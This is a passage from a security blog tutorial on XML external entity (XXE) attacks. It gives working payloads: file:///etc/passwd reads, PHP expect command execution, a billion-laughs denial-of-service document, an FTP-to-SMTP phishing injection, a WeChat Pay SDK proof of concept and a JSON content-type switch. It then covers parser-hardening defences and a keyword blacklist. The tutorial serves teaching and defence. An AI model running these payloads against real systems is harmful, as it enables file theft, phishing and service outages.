When an FTP client connects using this URL, the following command will be sent to the mail server on VULNERABLESYSTEM.com:

Sample code:

ftp://a
EHLO a
MAIL FROM: <support@VULNERABLESYSTEM.com>
RCPT TO: <victim@gmail.com>
DATA
From: support@VULNERABLESYSTEM.com
To: victim@gmail.com
Subject: Reset your password
We need to confirm your identity. Confirm your password here: http://PHISHING_URL.com
.
QUIT
:[email protected]:25

This means attackers can send phishing emails (for example, account reset links) from a trusted source and bypass spam filters. Besides links, we can even send attachments.

Experiment 8: Others:

Besides the common uses shown in the experiments above, there are some less common or less useful ones. For completeness, I cover them briefly here:

1. PHP expect RCE

PHP's expect extension is not installed by default, but if it is installed, we can use XXE directly for RCE.

Sample code:

<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]>
<dir>
<file>&cmd;</file>
</dir>

2. Using XXE for DoS attacks

Sample code:

<?xml version="1.0"?>
     <!DOCTYPE lolz [
     <!ENTITY lol "lol">
     <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
     ]>
     <lolz>&lol9;</lolz>
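The payload above is the classic "billion laughs" pattern: each entity expands to ten copies of the previous one, so the output grows exponentially with the nesting depth. Strictly speaking, it relies only on internal entities, not external ones. The arithmetic can be sketched in Python as follows; `expanded_size` is a hypothetical helper, and its arguments are read off the payload (a 3-byte base string, a fan-out of 10, and 8 levels from lol2 to lol9).

```python
def expanded_size(base_text, fan_out, levels):
    """Size in bytes of the fully expanded top-level entity."""
    return len(base_text.encode("utf-8")) * fan_out ** levels


# lol2 holds 10 copies of "lol", lol3 holds 100, ..., lol9 holds 10**8.
size = expanded_size("lol", fan_out=10, levels=8)
print(f"{size:,} bytes (~{size / 2**20:.0f} MiB)")
```

In other words, a document of roughly one kilobyte asks the parser to produce about 300 MB of text, which is what exhausts memory on a parser with no expansion limit.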

5. Where does the real XXE appear?

So far we have only discussed how this vulnerability works; we have not yet said where it actually appears

Today's web is an era of front-end and back-end separation. Some people say that MVC already separates the two, but I think that separation is incomplete, because the back end still has to call a rendering class to control how the front end is rendered. The separation I mean is this: the back-end API is only responsible for accepting the agreed input data and, after a series of black-box computations, returning the result to the front end in JSON format; the front end simply takes that JSON and decodes it. (The back end here can be server-side code or an external API, and the front end can be a traditional front end or server-side code.)

The problem usually arises when the API can parse XML passed in by the client and resolves external entities in it, as in the following example

Example 1: Simulation situation

Sample code:

POST /vulnerable HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://test.com/test.html
Content-Type: application/xml
Content-Length: 294
Cookie: mycookie=cookies;
Connection: close
Upgrade-Insecure-Requests: 1

<?xml version="1.0"?>
<catalog>
   <core id="test101">
      <author>John, Doe</author>
      <title>I love XML</title>
      <category>Computers</category>
      <price>9.99</price>
      <date>2018-10-01</date>
      <description>XML is the best!</description>
   </core>
</catalog>

After we send this POST request, the XML above is parsed by the server's XML processor, and the server returns: {"Request Successful": "Added!"}

But if we pass in a malicious payload:

<?xml version="1.0"?>
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<catalog>
   <core id="test101">
      <author>John, Doe</author>
      <title>I love XML</title>
      <category>Computers</category>
      <price>9.99</price>
      <date>2018-10-01</date>
      <description>&xxe;</description>
   </core>
</catalog>

If the parser is not securely configured, the malicious entity is resolved and the server returns something like the following

{"error": "no results for description root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync...

Example 2: XXE of WeChat Pay

Of course, I have to mention the WeChat Pay XXE vulnerability, which attracted a lot of attention a while ago.

Vulnerability description:

WeChat Pay provides an API interface for merchants to receive asynchronous payment results. The Java SDK used for WeChat Pay may trigger an XXE vulnerability when processing these results. An attacker can send a malicious payload to this interface to read arbitrary information from the merchant's server. Once the attacker obtains sensitive data (md5-key, merchant-Id, etc.), they may be able to buy any item from the merchant without paying by sending forged notifications

I downloaded the Java version of the SDK for analysis. It provides a WXPayUtil utility class that implements the two methods xmlToMap and mapToXml. The XXE vulnerability in WeChat Pay is triggered in the xmlToMap method

as the picture shows:

The problem is in the part I have drawn out with a horizontal line, which is simplified to the following code:

public static Map<String, String> xmlToMap(String strXML) throws Exception {
        try {
            Map<String, String> data = new HashMap<String, String>();
            DocumentBuilder documentBuilder = WXPayXmlUtil.newDocumentBuilder();
            InputStream stream = new ByteArrayInputStream(strXML.getBytes("UTF-8"));
            org.w3c.dom.Document doc = documentBuilder.parse(stream);
            ...

We can see that once the documentBuilder is built, the incoming strXML is parsed directly. Unfortunately, strXML is controlled by the attacker, which is how the XXE vulnerability arises. The following are the steps of my experiment

First of all, I created a new package under the com package to write our test code. I named the test code test001.java

as the picture shows:

test001.java

package com.test.test001;

import java.util.Map;

import static com.github.wxpay.sdk.WXPayUtil.xmlToMap;

public class test001 {
    public static void main(String args[]) throws Exception {

        String xmlStr ="<?xml version='1.0' encoding='utf-8'?>\r\n" +
                "<!DOCTYPE XDSEC [\r\n" +
                "<!ENTITY xxe SYSTEM 'file:///d:/1.txt'>]>\r\n" +
                "<XDSEC>\r\n"+
                "<XXE>&xxe;</XXE>\r\n" +
                "</XDSEC>";

        try{

            Map<String,String> test = xmlToMap(xmlStr);
            System.out.println(test);
        }catch (Exception e){
            e.printStackTrace();
        }

    }
}

I hope it can read the 1.txt file under my D drive

Successfully read after running

as the picture shows:

Note that WXPayXmlUtil.java contains the following parser feature settings, which directly determine whether the experiment succeeds. The later fix consists of exactly these settings.

http://apache.org/xml/features/disallow-doctype-decl true
http://apache.org/xml/features/nonvalidating/load-external-dtd false
http://xml.org/sax/features/external-general-entities false
http://xml.org/sax/features/external-parameter-entities false

I have packaged all the materials and uploaded them; interested readers can run the code and try it out

Link: Internet Safety Information 

As mentioned above, there is a netdoc:/ protocol in java that can replace file:///. Let me demonstrate it now:

as the picture shows:

Example 3: JSON content-type XXE

As we know, many web and mobile applications rely on web services for client-server interaction. Whether the service is SOAP or RESTful, the most common data formats are XML and JSON. Although a web service may be written to use only one of these formats, the server may still accept other formats that the developer did not anticipate, which can lead to XXE (XML External Entity) attacks on JSON endpoints

Raw request and response:

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name netspitest"}

Now we try to modify the Content-Type to application/xml

Further requests and responses:

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 127

{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}

The error shows that the server does parse XML, so we can use this to attack

Final request and response:

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467

{"error": "no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
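The step from the JSON request to the XML request can be sketched in Python: a flat JSON object is mapped to one child element per key under a wrapper element. The helper name `json_to_xml` is an assumption for illustration; the `root` wrapper is taken from the final request above, and a real service may expect a different element name.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(json_text, root_name="root"):
    """Convert a flat JSON object into an equivalent XML document string."""
    data = json.loads(json_text)
    root = ET.Element(root_name)
    for key, value in data.items():
        # One child element per JSON key, with the value as its text.
        child = ET.SubElement(root, key)
        child.text = str(value)
    return ET.tostring(root, encoding="unicode")


body = json_to_xml('{"search":"name","value":"netspitest"}')
print(body)
```

Sending a body like this with Content-Type: application/xml is a way to confirm that the endpoint accepts a well-formed XML equivalent of the JSON request before any entity is involved.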

6. How XXE defends

Option 1: Use the language-recommended method of disabling external entities

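PHP (libxml_disable_entity_loader is deprecated as of PHP 8.0, where libxml 2.9.0 or later already disables external entity loading by default):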

libxml_disable_entity_loader(true);

JAVA:

import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
// Each setFeature call can throw ParserConfigurationException
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Python:

from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
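When lxml is not available, the same idea as disallow-doctype-decl can be approximated with Python's standard library by refusing any document that declares a DOCTYPE before it reaches the real parser. This is a minimal sketch, not a replacement for a hardened parser configuration; `DoctypeForbidden` and `assert_no_doctype` are hypothetical names.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def assert_no_doctype(xml_bytes):
    """Scan the document with expat and fail as soon as a DOCTYPE starts."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising inside the handler aborts parsing and propagates to the caller.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


assert_no_doctype(b"<catalog><price>9.99</price></catalog>")  # passes silently
```

Because entities can only be declared inside a DOCTYPE, rejecting the declaration outright rules out external entities along with entity-expansion payloads. Malformed input still raises expat's own `ExpatError`.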

Solution 2: Manual blacklist filtering (not recommended)

Filter keywords:

<!DOCTYPE, <!ENTITY, SYSTEM, PUBLIC
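One reason the blacklist is not recommended: it matches raw bytes, while the XML parser decodes the document first. The Python sketch below, using the hypothetical helpers `blacklist_blocks` and `parser_sees_doctype`, shows a document encoded as UTF-16 slipping past a byte-level keyword filter even though the parser still sees its DOCTYPE. The entity used here is a harmless internal one.

```python
import xml.parsers.expat

KEYWORDS = (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM", b"PUBLIC")


def blacklist_blocks(xml_bytes):
    """Naive filter: block the request if any keyword appears in the raw bytes."""
    return any(keyword in xml_bytes for keyword in KEYWORDS)


def parser_sees_doctype(xml_bytes):
    """Return True if an XML parser encounters a DOCTYPE in the document."""
    seen = []
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = lambda *args: seen.append(args[0])
    parser.Parse(xml_bytes, True)
    return bool(seen)


document = '<!DOCTYPE r [<!ENTITY e "x">]><r>&e;</r>'
utf8_bytes = document.encode("utf-8")
utf16_bytes = document.encode("utf-16")  # BOM plus two bytes per character

print(blacklist_blocks(utf8_bytes), parser_sees_doctype(utf8_bytes))
print(blacklist_blocks(utf16_bytes), parser_sees_doctype(utf16_bytes))
```

The filter catches the UTF-8 form but misses the UTF-16 form, because every ASCII character is interleaved with a zero byte. Disabling the feature in the parser itself does not depend on how the bytes are encoded.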

7. Summary

Writing this article gave me a fresh understanding of the XXE vulnerability, and I ran hands-on tests of some of the details. The focus was on the netdoc and jar protocols. The jar protocol technique is remarkable, and there is relatively little material about it online, so testing it took me a long time. I hope real-world cases will turn up; finding more ways to exploit it still depends on the efforts of other researchers.

Your knowledge determines your attack surface

Origin blog.csdn.net/jazzz98/article/details/130425153